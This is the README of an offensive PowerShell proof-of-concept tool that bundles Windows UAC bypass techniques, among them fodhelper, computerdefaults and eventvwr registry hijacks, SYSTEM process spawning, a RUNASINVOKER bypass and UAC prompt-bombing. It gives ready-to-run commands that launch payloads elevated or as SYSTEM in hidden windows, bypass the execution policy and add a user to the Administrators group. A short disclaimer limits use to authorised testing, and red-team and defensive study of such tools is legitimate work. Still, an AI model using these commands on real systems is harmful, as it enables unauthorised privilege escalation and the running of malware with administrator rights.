This PowerShell script is a proof-of-concept (PoC) demonstrating various known User Account Control (UAC) bypass methods in Windows. It enables testing of multiple techniques to execute commands with elevated (administrator) privileges without triggering a UAC prompt.
Supports executing individual methods such as
fodhelper,eventvwr,computerdefaults,sdclt,wsreset,mmc,eudcedit,netplwiz, or running all sequentially until one succeeds.
- Manipulates registry keys to hijack system processes for privilege elevation.
- Launches the corresponding system executable tied to each bypass method.
- Cleans up registry entries after execution.
- Accepts a custom command to run elevated (default is
cmd.exe). - Includes a method to create a SYSTEM process.
- Runs UAC Bypass with RUNASINVOKER variable.
- Uses UAC-Prompt-Bombing Attack seen here: Article: New Botnet Emerges from the Shadows: NightshadeC2
| Method | Description | Status (2025) |
|---|---|---|
| fodhelper | Registry-based bypass with fodhelper.exe | Works reliably on current Windows 10 and 11 |
| eventvwr | Event Viewer registry bypass | Works reliably on Windows 7 |
| computerdefaults | Registry-based bypass with computerdefaults.exe | Works reliably on current Windows 10 and 11 |
| sdclt | Registry-based bypass with sdclt.exe | Mostly patched, often non-functional |
| wsreset | Limited functionality with wsreset.exe | Works depending on system configuration |
| mmc | Limited functionality with mmc.exe | Works under specific conditions |
| eudcedit | Limited functionality with eudcedit.exe | Works under specific conditions |
| netplwiz | Limited functionality with netplwiz.exe | Works under specific conditions |
| all | Runs all methods sequentially | Attempts all methods until one succeeds |
- Windows 7 or later.
- Localgroup
Administratorsprivileges. Check/Add withnet localgroup Administrators user /add - PowerShell with permissions to modify registry keys and execute scripts.
- On most current Windows versions, some bypass methods are patched;
fodhelperandeventvwrare generally still effective.
# For Hiding the Banner and UAChaos output use: -WindowStyle Hidden
powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& {.\UAChaos.ps1 -Method computerdefaults -Command 'cmd'}"# Run a single method (computerdefaults) with default elevated command (cmd.exe)
.\UAChaos.ps1 -Method computerdefaults
# Run a single method (computerdefaults) with command payload.exe as SYSTEM (Hidden)
.\UAChaos.ps1 -Method computerdefaults -Command "C:\Temp\payload.exe" -GetSystem
# Run UAC-Prompt-Bombing File. No Commands yet!
.\UAChaos.ps1 -UACBombing -Command "C:\Temp\payload_cmd.exe"
# Run RUNASINVOKER UAC Bypass with Commands
.\UAChaos.ps1 -RunAsInvoker -Command "mmc"
# Run all methods sequentially
.\UAChaos.ps1 -Method all
# Run fodhelper with a custom command (e.g., PowerShell)
.\UAChaos.ps1 -Method fodhelper -Command "powershell.exe -NoProfile"- Needs MSDT Tools signed by MS (ServiceUI.exe)
- Check first with
query useryour Session ID
.\UAChaos.ps1 -Method computerdefaults -Command "C:\Temp\ServiceUI.exe -session:2 C:\Windows\System32\cmd.exe" -GetSystem- This script is intended strictly for educational and authorized testing purposes.
- UAC bypass techniques circumvent security controls and must only be used with explicit permission.
- Unauthorized use may violate laws and policies.
- Use responsibly and ethically.
This Script is at the moment alpha with maybe many bugs. If you find some and want to contribute, please write an issue